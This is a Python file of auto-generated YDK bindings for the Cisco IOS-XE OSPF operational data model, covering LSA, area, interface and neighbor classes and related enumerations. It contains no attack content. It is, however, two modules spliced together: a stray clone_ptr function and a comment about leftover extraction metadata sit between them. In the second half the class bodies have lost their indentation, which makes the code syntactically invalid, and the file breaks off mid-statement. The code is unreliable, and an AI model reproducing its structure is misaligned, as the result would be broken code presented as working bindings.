        The network Link State Advertisements.

        .. attribute:: network_lsa_mask

            Network Link State Advertisement mask.  **type**\: int (uint32)

        .. attribute:: network_attached_routers

            Network attached routers.  **type**\: list of int (uint32)
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, self).__init__()

            self.yang_name = "network-lsa"
            self.yang_parent_name = "ospfv2-lsdb-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])),
                ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])),
            ])
            self.network_lsa_mask = None
            self.network_attached_routers = []
            self._segment_path = lambda: "network-lsa"
            # Must stay last: enables validated attribute assignment.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value)


    class NetworkSummaryLsa(Entity):
        """
        The network summary Link State Advertisements.

        .. attribute:: summary_lsa_mask

            The summary Link State Advertisement mask.  **type**\: int (uint32)

        .. attribute:: summary_topo

            The summary topology (list of :py:class:`SummaryTopo`).
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, self).__init__()

            self.yang_name = "network-summary-lsa"
            self.yang_parent_name = "ospfv2-lsdb-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo))])
            self._leafs = OrderedDict([
                ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
            ])
            self.summary_lsa_mask = None

            self.summary_topo = YList(self)
            self._segment_path = lambda: "network-summary-lsa"
            # Must stay last: enables validated attribute assignment.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, ['summary_lsa_mask'], name, value)


        class SummaryTopo(Entity):
            """
            The summary topology.

            .. attribute:: mt_id

                Multi topology identifier.  **type**\: int, **range:** 0..255

            .. attribute:: topo_metric

                Topology metric.  **type**\: int (uint32)
            """

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, self).__init__()

                self.yang_name = "summary-topo"
                self.yang_parent_name = "network-summary-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                    ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                ])
                self.mt_id = None
                self.topo_metric = None
                self._segment_path = lambda: "summary-topo"
                # Must stay last: enables validated attribute assignment.
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)


    class RouterSummaryLsa(Entity):
        """
        The router summary Link State Advertisements.

        .. attribute:: summary_lsa_mask

            The summary Link State Advertisement mask.  **type**\: int (uint32)

        .. attribute:: summary_topo

            The summary topology (list of :py:class:`SummaryTopo`).
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, self).__init__()

            self.yang_name = "router-summary-lsa"
            self.yang_parent_name = "ospfv2-lsdb-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo))])
            self._leafs = OrderedDict([
                ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
            ])
            self.summary_lsa_mask = None

            self.summary_topo = YList(self)
            self._segment_path = lambda: "router-summary-lsa"
            # Must stay last: enables validated attribute assignment.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, ['summary_lsa_mask'], name, value)


        class SummaryTopo(Entity):
            """
            The summary topology.

            .. attribute:: mt_id

                Multi topology identifier.  **type**\: int, **range:** 0..255

            .. attribute:: topo_metric

                Topology metric.  **type**\: int (uint32)
            """

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, self).__init__()

                self.yang_name = "summary-topo"
                self.yang_parent_name = "router-summary-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                    ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                ])
                self.mt_id = None
                self.topo_metric = None
                self._segment_path = lambda: "summary-topo"
                # Must stay last: enables validated attribute assignment.
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)


    class ExternalLsa(Entity):
        """
        The external Link State Advertisements.

        .. attribute:: external_lsa_mask

            The mask for the external Link State Advertisement.
            **type**\: int (uint32)

        .. attribute:: external_topo

            The external topology Link State Advertisement
            (list of :py:class:`ExternalTopo`).
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, self).__init__()

            self.yang_name = "external-lsa"
            self.yang_parent_name = "ospfv2-lsdb-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo))])
            self._leafs = OrderedDict([
                ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
            ])
            self.external_lsa_mask = None

            self.external_topo = YList(self)
            self._segment_path = lambda: "external-lsa"
            # Must stay last: enables validated attribute assignment.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, ['external_lsa_mask'], name, value)


        class ExternalTopo(Entity):
            """
            The external topology Link State Advertisement.

            .. attribute:: mt_id

                The multi topology identifier.  **type**\: int, **range:** 0..255

            .. attribute:: topo_metric_type

                The topology metric type associated with the Link State
                Advertisement.
                **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>`

            .. attribute:: topo_metric

                The topology metric.  **type**\: int (uint32)

            .. attribute:: topo_forwarding_address

                The topology forwarding address (IPv4 or IPv6 string).
                **type**\: str

            .. attribute:: topo_route_tag

                The topology route tag.  **type**\: int (uint32)
            """

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, self).__init__()

                self.yang_name = "external-topo"
                self.yang_parent_name = "external-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                    ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
                    ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                    ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
                    ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
                ])
                self.mt_id = None
                self.topo_metric_type = None
                self.topo_metric = None
                self.topo_forwarding_address = None
                self.topo_route_tag = None
                self._segment_path = lambda: "external-topo"
                # Must stay last: enables validated attribute assignment.
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)


    class NssaLsa(Entity):
        """
        The Not So Stubby Area Link State Advertisements.

        .. attribute:: external_lsa_mask

            The mask for the external Link State Advertisement.
            **type**\: int (uint32)

        .. attribute:: external_topo

            The external topology Link State Advertisement
            (list of :py:class:`ExternalTopo`).
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, self).__init__()

            self.yang_name = "nssa-lsa"
            self.yang_parent_name = "ospfv2-lsdb-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo))])
            self._leafs = OrderedDict([
                ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
            ])
            self.external_lsa_mask = None

            self.external_topo = YList(self)
            self._segment_path = lambda: "nssa-lsa"
            # Must stay last: enables validated attribute assignment.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, ['external_lsa_mask'], name, value)


        class ExternalTopo(Entity):
            """
            The external topology Link State Advertisement.

            .. attribute:: mt_id

                The multi topology identifier.  **type**\: int, **range:** 0..255

            .. attribute:: topo_metric_type

                The topology metric type associated with the Link State
                Advertisement.
                **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>`

            .. attribute:: topo_metric

                The topology metric.  **type**\: int (uint32)

            .. attribute:: topo_forwarding_address

                The topology forwarding address (IPv4 or IPv6 string).
                **type**\: str

            .. attribute:: topo_route_tag

                The topology route tag.  **type**\: int (uint32)
            """

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, self).__init__()

                self.yang_name = "external-topo"
                self.yang_parent_name = "nssa-lsa"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                    ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
                    ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                    ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
                    ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
                ])
                self.mt_id = None
                self.topo_metric_type = None
                self.topo_metric = None
                self.topo_forwarding_address = None
                self.topo_route_tag = None
                self._segment_path = lambda: "external-topo"
                # Must stay last: enables validated attribute assignment.
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
def clone_ptr(self):
    """Build a fresh top-level OspfOperData entity, cache it on this
    instance as the clone target, and return it."""
    top = OspfOperData()
    self._top_entity = top
    return top
# NOTE(review): the lines "| 53.996849 | 1,779 | 0.368293 |" that appeared here
# were not source code — they are tabular metadata (average line length, max
# line length, alphanumeric fraction) left over from a file-concatenation /
# extraction step between two generated modules, and have been commented out.
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class AddressFamily(Enum):
    """YANG enumeration of the address family of an OSPF instance (IPv4 or IPv6)."""
    address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4")
    address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6")
class NbrStateType(Enum):
    """YANG enumeration of OSPF neighbor states, Down (1) through Full (8).

    The names mirror the classic OSPF neighbor state machine
    (down, attempt, init, two-way, exchange-start, exchange, loading, full).
    """
    ospf_nbr_down = Enum.YLeaf(1, "ospf-nbr-down")
    ospf_nbr_attempt = Enum.YLeaf(2, "ospf-nbr-attempt")
    ospf_nbr_init = Enum.YLeaf(3, "ospf-nbr-init")
    ospf_nbr_two_way = Enum.YLeaf(4, "ospf-nbr-two-way")
    ospf_nbr_exchange_start = Enum.YLeaf(5, "ospf-nbr-exchange-start")
    ospf_nbr_exchange = Enum.YLeaf(6, "ospf-nbr-exchange")
    ospf_nbr_loading = Enum.YLeaf(7, "ospf-nbr-loading")
    ospf_nbr_full = Enum.YLeaf(8, "ospf-nbr-full")
class OspfAuthType(Enum):
    """YANG enumeration of OSPF authentication mechanisms (IPsec, trailer keychain, trailer key, none)."""
    ospf_auth_ipsec = Enum.YLeaf(0, "ospf-auth-ipsec")
    ospf_auth_trailer_keychain = Enum.YLeaf(1, "ospf-auth-trailer-keychain")
    ospf_auth_trailer_key = Enum.YLeaf(2, "ospf-auth-trailer-key")
    ospf_auth_type_none = Enum.YLeaf(3, "ospf-auth-type-none")
class OspfExternalMetricType(Enum):
    """YANG enumeration of the external route metric type (OSPF type 1 vs type 2)."""
    ospf_ext_metric_type_1 = Enum.YLeaf(0, "ospf-ext-metric-type-1")
    ospf_ext_metric_type_2 = Enum.YLeaf(1, "ospf-ext-metric-type-2")
class OspfNetworkType(Enum):
    """YANG enumeration of OSPF interface network types."""
    ospf_broadcast = Enum.YLeaf(0, "ospf-broadcast")
    ospf_non_broadcast = Enum.YLeaf(1, "ospf-non-broadcast")
    ospf_point_to_multipoint = Enum.YLeaf(2, "ospf-point-to-multipoint")
    ospf_point_to_point = Enum.YLeaf(3, "ospf-point-to-point")
class OspfOperationMode(Enum):
    """YANG enumeration of the OSPF operation mode; only ships-in-the-night is modeled."""
    ospf_ships_in_the_night = Enum.YLeaf(0, "ospf-ships-in-the-night")
class Ospfv2AuthTypeSelection(Enum):
    """YANG enumeration selecting the OSPFv2 authentication type (none, trailer key, trailer key chain)."""
    ospfv2_auth_none = Enum.YLeaf(0, "ospfv2-auth-none")
    ospfv2_auth_trailer_key = Enum.YLeaf(1, "ospfv2-auth-trailer-key")
    ospfv2_auth_trailer_key_chain = Enum.YLeaf(2, "ospfv2-auth-trailer-key-chain")
class Ospfv2CryptoAlgorithm(Enum):
    """YANG enumeration of the OSPFv2 crypto algorithm (cleartext or MD5).

    NOTE: "cleartest" is the spelling emitted by the YANG model; it must not
    be corrected here because the identifier is part of the generated API.
    """
    ospfv2_crypto_cleartest = Enum.YLeaf(0, "ospfv2-crypto-cleartest")
    ospfv2_crypto_md5 = Enum.YLeaf(1, "ospfv2-crypto-md5")
class Ospfv2IntfState(Enum):
    """YANG enumeration of OSPFv2 interface states (down, loopback, waiting,
    point-to-multipoint, point-to-point, DR, backup, other)."""
    ospfv2_interface_state_down = Enum.YLeaf(0, "ospfv2-interface-state-down")
    ospfv2_interface_state_loopback = Enum.YLeaf(1, "ospfv2-interface-state-loopback")
    ospfv2_interface_state_waiting = Enum.YLeaf(2, "ospfv2-interface-state-waiting")
    ospfv2_interface_state_point_to_mpoint = Enum.YLeaf(3, "ospfv2-interface-state-point-to-mpoint")
    ospfv2_interface_state_point_to_point = Enum.YLeaf(4, "ospfv2-interface-state-point-to-point")
    ospfv2_interface_state_dr = Enum.YLeaf(5, "ospfv2-interface-state-dr")
    ospfv2_interface_state_backup = Enum.YLeaf(6, "ospfv2-interface-state-backup")
    ospfv2_interface_state_other = Enum.YLeaf(7, "ospfv2-interface-state-other")
class Ospfv2LsaType(Enum):
    """YANG enumeration of OSPFv2 LSA types (router, network, summary,
    AS-external, NSSA, opaque variants), with 0 for unsupported types."""
    ospfv2_lsa_type_unsupported_lsa_type = Enum.YLeaf(0, "ospfv2-lsa-type-unsupported-lsa-type")
    ospfv2_lsa_type_router = Enum.YLeaf(1, "ospfv2-lsa-type-router")
    ospfv2_lsa_type_network = Enum.YLeaf(2, "ospfv2-lsa-type-network")
    ospfv2_lsa_type_summary_net = Enum.YLeaf(3, "ospfv2-lsa-type-summary-net")
    ospfv2_lsa_type_summary_router = Enum.YLeaf(4, "ospfv2-lsa-type-summary-router")
    ospfv2_lsa_type_as_external = Enum.YLeaf(5, "ospfv2-lsa-type-as-external")
    ospfv2_lsa_type_nssa = Enum.YLeaf(6, "ospfv2-lsa-type-nssa")
    ospfv2_lsa_type_link_scope_opaque = Enum.YLeaf(7, "ospfv2-lsa-type-link-scope-opaque")
    ospfv2_lsa_type_area_scope_opaque = Enum.YLeaf(8, "ospfv2-lsa-type-area-scope-opaque")
    ospfv2_lsa_type_as_scope_opaque = Enum.YLeaf(9, "ospfv2-lsa-type-as-scope-opaque")
class OspfOperData(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    # Register the top-level 'ospf-oper-data' container: two children
    # (the 'ospf-state' presence container and the 'ospfv2-instance' list),
    # no leafs of its own. The _is_frozen flag must be set LAST — after it,
    # __setattr__ routes writes through _perform_setattr validation.
    super(OspfOperData, self).__init__()
    self._top_entity = None
    self.yang_name = "ospf-oper-data"
    self.yang_parent_name = "Cisco-IOS-XE-ospf-oper"
    self.is_top_level_class = True
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("ospf-state", ("ospf_state", OspfOperData.OspfState)), ("ospfv2-instance", ("ospfv2_instance", OspfOperData.Ospfv2Instance))])
    self._leafs = OrderedDict()
    self.ospf_state = None
    self._children_name_map["ospf_state"] = "ospf-state"
    self.ospfv2_instance = YList(self)
    self._segment_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data"
    self._is_frozen = True
def __setattr__(self, name, value):
    # No writable leafs at the top level — empty leaf list, validation only.
    self._perform_setattr(OspfOperData, [], name, value)
class OspfState(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    # 'ospf-state' presence container holding the operation mode leaf and
    # the 'ospf-instance' list; frozen after all metadata is registered.
    super(OspfOperData.OspfState, self).__init__()
    self.yang_name = "ospf-state"
    self.yang_parent_name = "ospf-oper-data"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("ospf-instance", ("ospf_instance", OspfOperData.OspfState.OspfInstance))])
    self.is_presence_container = True
    self._leafs = OrderedDict([
        ('op_mode', (YLeaf(YType.enumeration, 'op-mode'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfOperationMode', '')])),
    ])
    self.op_mode = None
    self.ospf_instance = YList(self)
    self._segment_path = lambda: "ospf-state"
    # Top-level node: absolute XPath can be computed without a parent.
    self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    # Validated assignment for the single 'op_mode' leaf.
    self._perform_setattr(OspfOperData.OspfState, ['op_mode'], name, value)
class OspfInstance(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    # 'ospf-instance' list entry keyed by (af, router-id); holds the
    # per-instance areas, link-scope LSAs and multi-topology lists.
    super(OspfOperData.OspfState.OspfInstance, self).__init__()
    self.yang_name = "ospf-instance"
    self.yang_parent_name = "ospf-state"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = ['af','router_id']
    self._child_classes = OrderedDict([("ospf-area", ("ospf_area", OspfOperData.OspfState.OspfInstance.OspfArea)), ("link-scope-lsas", ("link_scope_lsas", OspfOperData.OspfState.OspfInstance.LinkScopeLsas)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.MultiTopology))])
    self._leafs = OrderedDict([
        ('af', (YLeaf(YType.enumeration, 'af'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'AddressFamily', '')])),
        ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
        ('process_id', (YLeaf(YType.uint16, 'process-id'), ['int'])),
    ])
    self.af = None
    self.router_id = None
    self.process_id = None
    self.ospf_area = YList(self)
    self.link_scope_lsas = YList(self)
    self.multi_topology = YList(self)
    # Segment path embeds both list keys as XPath predicates.
    self._segment_path = lambda: "ospf-instance" + "[af='" + str(self.af) + "']" + "[router-id='" + str(self.router_id) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/ospf-state/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    # Validated assignment for the instance's three leafs.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance, ['af', 'router_id', 'process_id'], name, value)
class OspfArea(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    # 'ospf-area' list entry keyed by area-id; contains the per-area
    # interfaces and area-scope LSAs.
    super(OspfOperData.OspfState.OspfInstance.OspfArea, self).__init__()
    self.yang_name = "ospf-area"
    self.yang_parent_name = "ospf-instance"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['area_id']
    self._child_classes = OrderedDict([("ospf-interface", ("ospf_interface", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa))])
    self._leafs = OrderedDict([
        ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])),
    ])
    self.area_id = None
    self.ospf_interface = YList(self)
    self.area_scope_lsa = YList(self)
    self._segment_path = lambda: "ospf-area" + "[area-id='" + str(self.area_id) + "']"
    self._is_frozen = True
def __setattr__(self, name, value):
    # Validated assignment for the 'area_id' key leaf.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea, ['area_id'], name, value)
class OspfInterface(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    # 'ospf-interface' list entry keyed by interface name. Registers a large
    # set of configuration/operational leafs plus singleton child containers
    # (multi-area, fast-reroute, ttl-security, authentication) and child
    # lists (static neighbors, OSPF neighbors, link-scope LSAs, topologies).
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, self).__init__()
    self.yang_name = "ospf-interface"
    self.yang_parent_name = "ospf-area"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['name']
    self._child_classes = OrderedDict([("multi-area", ("multi_area", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea)), ("static-neighbor", ("static_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor)), ("fast-reroute", ("fast_reroute", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute)), ("ttl-security", ("ttl_security", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity)), ("authentication", ("authentication", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication)), ("ospf-neighbor", ("ospf_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor)), ("intf-link-scope-lsas", ("intf_link_scope_lsas", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas)), ("intf-multi-topology", ("intf_multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology))])
    self._leafs = OrderedDict([
        ('name', (YLeaf(YType.str, 'name'), ['str'])),
        ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])),
        ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])),
        ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])),
        ('node_flag', (YLeaf(YType.boolean, 'node-flag'), ['bool'])),
        ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
        ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])),
        ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])),
        ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])),
        ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])),
        ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])),
        ('lls', (YLeaf(YType.boolean, 'lls'), ['bool'])),
        ('prefix_suppression', (YLeaf(YType.boolean, 'prefix-suppression'), ['bool'])),
        ('bfd', (YLeaf(YType.boolean, 'bfd'), ['bool'])),
        ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
        ('state', (YLeaf(YType.str, 'state'), ['str'])),
        ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])),
        ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])),
        ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])),
        ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])),
        ('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
    ])
    self.name = None
    self.network_type = None
    self.passive = None
    self.demand_circuit = None
    self.node_flag = None
    self.cost = None
    self.hello_interval = None
    self.dead_interval = None
    self.retransmit_interval = None
    self.transmit_delay = None
    self.mtu_ignore = None
    self.lls = None
    self.prefix_suppression = None
    self.bfd = None
    self.enable = None
    self.state = None
    self.hello_timer = None
    self.wait_timer = None
    self.dr = None
    self.bdr = None
    self.priority = None
    # Singleton child containers are instantiated eagerly and re-parented.
    self.multi_area = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea()
    self.multi_area.parent = self
    self._children_name_map["multi_area"] = "multi-area"
    self.fast_reroute = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute()
    self.fast_reroute.parent = self
    self._children_name_map["fast_reroute"] = "fast-reroute"
    self.ttl_security = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity()
    self.ttl_security.parent = self
    self._children_name_map["ttl_security"] = "ttl-security"
    self.authentication = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication()
    self.authentication.parent = self
    self._children_name_map["authentication"] = "authentication"
    self.static_neighbor = YList(self)
    self.ospf_neighbor = YList(self)
    self.intf_link_scope_lsas = YList(self)
    self.intf_multi_topology = YList(self)
    self._segment_path = lambda: "ospf-interface" + "[name='" + str(self.name) + "']"
    self._is_frozen = True
def __setattr__(self, name, value):
    # Validated assignment for all interface leafs declared in __init__.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, ['name', 'network_type', 'passive', 'demand_circuit', 'node_flag', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'mtu_ignore', 'lls', 'prefix_suppression', 'bfd', 'enable', 'state', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'priority'], name, value)
class MultiArea(Entity):
    """Singleton 'multi-area' container under ospf-interface: multi-area id and cost leafs."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        # Register metadata for the 'multi-area' container, then freeze.
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, self).__init__()
        self.yang_name = "multi-area"
        self.yang_parent_name = "ospf-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('multi_area_id', (YLeaf(YType.uint32, 'multi-area-id'), ['int'])),
            ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
        ])
        self.multi_area_id = None
        self.cost = None
        self._segment_path = lambda: "multi-area"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validated assignment for the two leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, ['multi_area_id', 'cost'], name, value)
class StaticNeighbor(Entity):
    """'static-neighbor' list entry under ospf-interface, keyed by neighbor address."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        # Register metadata; 'address' is the list key and appears in the
        # segment path as an XPath predicate.
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, self).__init__()
        self.yang_name = "static-neighbor"
        self.yang_parent_name = "ospf-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['address']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
